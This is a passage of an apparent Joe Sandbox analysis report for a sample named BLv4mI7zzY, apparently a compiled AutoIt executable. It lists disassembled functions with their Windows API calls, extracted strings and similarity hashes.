                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: e7ecfbfc5602f83940e77b70c465381fb59a237458312d08fe6f8ff530d5ad42
                                                              • Instruction ID: 4783cfa0e4c92332b82c53b4b3f56daa05678e51c35307234d707232dc34c6ba
                                                              • Opcode Fuzzy Hash: e7ecfbfc5602f83940e77b70c465381fb59a237458312d08fe6f8ff530d5ad42
                                                              • Instruction Fuzzy Hash: 1531F471600305BBDF24DE48CA45BAFBFB8EF45350F14003AE980A62A1D7B89944CB59
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 004B6761
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004B676C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: Combobox
                                                              • API String ID: 3850602802-2096851135
                                                              • Opcode ID: e542e55905173c821667088946b297fbac814ff45512ab7898c47cb65a283a13
                                                              • Instruction ID: 13a17a7c40439ca74728f3ed4e4104743290fc8ac9792b8509954a086f73af58
                                                              • Opcode Fuzzy Hash: e542e55905173c821667088946b297fbac814ff45512ab7898c47cb65a283a13
                                                              • Instruction Fuzzy Hash: 341186752002087FEF119F55CC81EFB376AEB48368F11452AF91897290DA7D9C5187B4
                                                              APIs
                                                                • Part of subcall function 00431D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00431D73
                                                                • Part of subcall function 00431D35: GetStockObject.GDI32(00000011), ref: 00431D87
                                                                • Part of subcall function 00431D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00431D91
                                                              • GetWindowRect.USER32(00000000,?), ref: 004B6C71
                                                              • GetSysColor.USER32(00000012), ref: 004B6C8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                              • String ID: static
                                                              • API String ID: 1983116058-2160076837
                                                              • Opcode ID: 97661a0327282c03e8f235e58f039e6fda912b35d2eb303bb798c520744f16ca
                                                              • Instruction ID: 806d0c5983c38ed6b3aa1ef88c8929a7845e43f4714302c9d2c02c2b88e674c0
                                                              • Opcode Fuzzy Hash: 97661a0327282c03e8f235e58f039e6fda912b35d2eb303bb798c520744f16ca
                                                              • Instruction Fuzzy Hash: 22211472610209AFDF14DFB8CC45AFA7BB8FB08314F11462AFD99D2250D639E861DB64
                                                              APIs
                                                              • GetWindowTextLengthW.USER32(00000000), ref: 004B69A2
                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004B69B1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LengthMessageSendTextWindow
                                                              • String ID: edit
                                                              • API String ID: 2978978980-2167791130
                                                              • Opcode ID: dedbe89c6e7fc2b54ab55831016cde4ced33e6ebfe68fd1c4f5555089a9151d9
                                                              • Instruction ID: a92fb91f5f7af9a0311891073e77b379c3d7dc61e83910852eb032209a177ce1
                                                              • Opcode Fuzzy Hash: dedbe89c6e7fc2b54ab55831016cde4ced33e6ebfe68fd1c4f5555089a9151d9
                                                              • Instruction Fuzzy Hash: D6118FB1100208ABEF108E68DC40AFB37A9EB05378F614726F9A5972E0C77DDC559778
                                                              APIs
                                                              • _memset.LIBCMT ref: 00492A22
                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00492A41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: InfoItemMenu_memset
                                                              • String ID: 0
                                                              • API String ID: 2223754486-4108050209
                                                              • Opcode ID: 2ff79ea5066d1411ba82203cd3800e97373e026e5437c213b79ea39a5f17f5e0
                                                              • Instruction ID: e36571b5be2ced7d85662dea750a09ec2866ef944b460403f31d0dd329ad172f
                                                              • Opcode Fuzzy Hash: 2ff79ea5066d1411ba82203cd3800e97373e026e5437c213b79ea39a5f17f5e0
                                                              • Instruction Fuzzy Hash: 2F11B173901115BBCF30DA58DE44FAF7BA8AB46304F044033E955A72A0D7B8AD0AC799
                                                              APIs
                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004A222C
                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 004A2255
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Internet$OpenOption
                                                              • String ID: <local>
                                                              • API String ID: 942729171-4266983199
                                                              • Opcode ID: a7873518de14be4ad99e472cbeee9d6915c63ff3d26d3a5acb95074d04e9eeb6
                                                              • Instruction ID: e5b87c98a616f7687c1b55fc1d72f2022e07f405056192c5712bd549e515313c
                                                              • Opcode Fuzzy Hash: a7873518de14be4ad99e472cbeee9d6915c63ff3d26d3a5acb95074d04e9eeb6
                                                              • Instruction Fuzzy Hash: 50110271501225BADB248F598D84FFBFBA8FF2B351F1082ABF90456140D2B89885E6F5
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00433C14,004F52F8,?,?,?), ref: 0044096E
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • _wcscat.LIBCMT ref: 00474CB7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath_memmove_wcscat
                                                              • String ID: SO
                                                              • API String ID: 257928180-2479146506
                                                              • Opcode ID: f640a01947042bb984440560f6d20ee6d56e1fd79a1f909e18ed8c23b144510d
                                                              • Instruction ID: 8a93b79f6fbb8d2b6d62b81810beafe023177904b06bca0f440e0f5800237d7e
                                                              • Opcode Fuzzy Hash: f640a01947042bb984440560f6d20ee6d56e1fd79a1f909e18ed8c23b144510d
                                                              • Instruction Fuzzy Hash: 4711A9B0A052099BDB10EB64CC05EDDB7F8EF0C744F0044ABBB48D3281EA78A698471D
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00488E73
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: bb5b7fd2184ba98cee1837e067857dd95e3cf6f51950d97822d0590a7fad73ae
                                                              • Instruction ID: fece98cf40a6e7d2ae50ef8bd21292d33f1aecab9c8d06d885305fdd1cd9a917
                                                              • Opcode Fuzzy Hash: bb5b7fd2184ba98cee1837e067857dd95e3cf6f51950d97822d0590a7fad73ae
                                                              • Instruction Fuzzy Hash: A501F1B1601218AB9B19FBA5CC419FE7368EF05320B540A1FB875A72E2DE395808D758
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock_memmove
                                                              • String ID: EA06
                                                              • API String ID: 1988441806-3962188686
                                                              • Opcode ID: 23b189b6043d8572e22b13926115d886354dabdb3f077499fdaa1d00e2b1f7b3
                                                              • Instruction ID: f32507c8bc577867d8a58cbae16b266a4f8018f4fdfc1ea4ce80eb614d974c3e
                                                              • Opcode Fuzzy Hash: 23b189b6043d8572e22b13926115d886354dabdb3f077499fdaa1d00e2b1f7b3
                                                              • Instruction Fuzzy Hash: F101F9718042587EDF18CAA9C816EFE7BF8DB11301F00459FF556D2181E878E6088764
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00488D6B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 1d279658681ebc459c54ac8f0394bdb6f350b327e4290a68ea7992c7a310e9dd
                                                              • Instruction ID: 570ceb4a2caab3ca2d951da0503db09feda6ecbb2da58a2a8fd7bf1e0c8b9474
                                                              • Opcode Fuzzy Hash: 1d279658681ebc459c54ac8f0394bdb6f350b327e4290a68ea7992c7a310e9dd
                                                              • Instruction Fuzzy Hash: 6F01D4B1A41108ABDB25FBE1C952AFF73A8DF15310F54041FB805632D1DE185E08D379
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 0048AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0048AABC
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00488DEE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameSend_memmove
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 372448540-1403004172
                                                              • Opcode ID: 7a22e16fc2b551d3725e4d3f4fa7bb96f0827b1b119c7b76876299320dd2b3d2
                                                              • Instruction ID: bfe0d8a037d827473189c8e2db0657162e1c9bc5bdf54c0f63ecc03088ce3393
                                                              • Opcode Fuzzy Hash: 7a22e16fc2b551d3725e4d3f4fa7bb96f0827b1b119c7b76876299320dd2b3d2
                                                              • Instruction Fuzzy Hash: E401F2B1A41108A7DB25FAA5C942AFF73A8DF15310F54041FB80573292DE295E09D37A
                                                              APIs
                                                              • VariantInit.OLEAUT32(?), ref: 0048C534
                                                                • Part of subcall function 0048C816: _memmove.LIBCMT ref: 0048C860
                                                                • Part of subcall function 0048C816: VariantInit.OLEAUT32(00000000), ref: 0048C882
                                                                • Part of subcall function 0048C816: VariantCopy.OLEAUT32(00000000,?), ref: 0048C88C
                                                              • VariantClear.OLEAUT32(?), ref: 0048C556
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Variant$Init$ClearCopy_memmove
                                                              • String ID: d}N
                                                              • API String ID: 2932060187-3144339906
                                                              • Opcode ID: 0f4c647d8e20e7535b84ad809df390941b7fd4e83684d1975135b24033d67448
                                                              • Instruction ID: 0d65bf68f8bf063ed6aed938753a6c6a4516173e0f1b0e78834a1493c0181d1c
                                                              • Opcode Fuzzy Hash: 0f4c647d8e20e7535b84ad809df390941b7fd4e83684d1975135b24033d67448
                                                              • Instruction Fuzzy Hash: 9C11FEB19007089FC710EF9AD8C489BF7F8FF18314B50862FE58A97611D775AA49CB94
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 85abd6fcf0a461ff045ff7c2ae55f24fe335122da948ee2d1666548b439ac6ba
                                                              • Instruction ID: 44387a7d758c3264ec622efcab41a87c00c277669179181dd4605749715c5b15
                                                              • Opcode Fuzzy Hash: 85abd6fcf0a461ff045ff7c2ae55f24fe335122da948ee2d1666548b439ac6ba
                                                              • Instruction Fuzzy Hash: A4E02B3250022C37D7109A59AC05FA7F7ACDB44B61F00006BFC04D2041D9609A0587D4
                                                              APIs
                                                                • Part of subcall function 0046B314: _memset.LIBCMT ref: 0046B321
                                                                • Part of subcall function 00450940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0046B2F0,?,?,?,0043100A), ref: 00450945
                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0043100A), ref: 0046B2F4
                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0043100A), ref: 0046B303
                                                              Strings
                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0046B2FE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                              • API String ID: 3158253471-631824599
                                                              • Opcode ID: 9e3dea6128a92d49b0573efd6c6a2f3e5d9cc92ced928cc3e840fb6f353937e5
                                                              • Instruction ID: 3890f5a22ad3d3ee27d1d14132c95837abdd7a8851f6d0b0af0251468cc490d5
                                                              • Opcode Fuzzy Hash: 9e3dea6128a92d49b0573efd6c6a2f3e5d9cc92ced928cc3e840fb6f353937e5
                                                              • Instruction Fuzzy Hash: 99E06D702007008BD7209F29E9043467BE4EF04308F008A7FE846C7341E7B8D488CBAA
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00487C82
                                                                • Part of subcall function 00453358: _doexit.LIBCMT ref: 00453362
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: b94840ca06726aabcb01ebe4f5f2ae3e607efd055acd9c58d73bf78fbf6008d4
                                                              • Instruction ID: a885d4eec8b380295b94f6eb7b850c34cb42d270d9e7439c2efddc1ecffbda6a
                                                              • Opcode Fuzzy Hash: b94840ca06726aabcb01ebe4f5f2ae3e607efd055acd9c58d73bf78fbf6008d4
                                                              • Instruction Fuzzy Hash: 5DD0123638435836D11536A66C07FCA76484B05B57F24042BFF08595D349D9958552AD
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00471775
                                                                • Part of subcall function 004ABFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0047195E,?), ref: 004ABFFE
                                                                • Part of subcall function 004ABFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 004AC010
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0047196D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 582185067-3257408948
                                                              • Opcode ID: c59efba94aee473e82419ebdfb4e8259092d574c20b2653d0f325f65c657f8b2
                                                              • Instruction ID: f720cd1170433683870a1732567ca8b07221a6d9f4672d56c8dc4c8784964812
                                                              • Opcode Fuzzy Hash: c59efba94aee473e82419ebdfb4e8259092d574c20b2653d0f325f65c657f8b2
                                                              • Instruction Fuzzy Hash: 1BF06D70800008DFCB19DBA9CD84BECBBF8BB18300F5440A6E00AB21A0C7384F86CF69
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004B596E
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004B5981
                                                                • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 403bb92a008d0a202e41cbc142a891abf4ab4a50418faeb9e98c317189773568
                                                              • Instruction ID: 80dad7ed3e4a9ae142dda815327e331912c758405f682364ca3aa8149d900a42
                                                              • Opcode Fuzzy Hash: 403bb92a008d0a202e41cbc142a891abf4ab4a50418faeb9e98c317189773568
                                                              • Instruction Fuzzy Hash: D3D0A931380300B7EA64AB309C0BFA22A10AB00B00F10093AB20DAA0D0C8E49800CB68
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004B59AE
                                                              • PostMessageW.USER32(00000000), ref: 004B59B5
                                                                • Part of subcall function 00495244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004952BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
